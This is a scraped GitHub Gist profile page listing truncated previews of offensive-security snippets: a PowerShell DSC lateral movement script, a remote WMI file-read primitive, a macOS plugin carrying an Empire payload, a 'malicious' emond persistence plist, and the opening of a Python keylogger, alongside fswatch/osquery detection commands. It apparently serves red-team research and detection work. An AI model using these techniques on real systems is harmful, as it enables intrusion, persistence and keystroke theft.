Skip to content

Instantly share code, notes, and snippets.

Chris Ross xorrior

View GitHub Profile
@xorrior
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@xorrior
xorrior / FileReadPrimitive.ps1
Created Jun 28, 2018 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
View FileReadPrimitive.ps1
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@xorrior
xorrior / SMConfMigratorPlugin.h
Created Jun 18, 2018
SMConfMigratorPlugin header file
View SMConfMigratorPlugin.h
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
@xorrior
xorrior / empire-migrationplugin.m
Created May 25, 2018
Migration Plugin with Empire Payload
View empire-migrationplugin.m
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
@xorrior
xorrior / messagebox.m
Last active Jan 31, 2018
Installer Plugin that pops a message box to the user
View messagebox.m
//
// MyInstallerPane.m
// messagebox
//
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
//
/*
This should be in MyInstallerPane.h
@xorrior
xorrior / emond-examples.txt
Last active Jan 19, 2018
fswatch and osquery command syntax w/ output
View emond-examples.txt
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
@xorrior
xorrior / bad.plist
Last active May 16, 2018
Example Malicious emond plist
View bad.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@xorrior
xorrior / SampleRules.plist
Created Jan 9, 2018
Sample Plist for emond
View SampleRules.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@xorrior
xorrior / keylogger.py
Created Dec 11, 2017
Python on disk keylogger
View keylogger.py
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
You can’t perform that action at this time.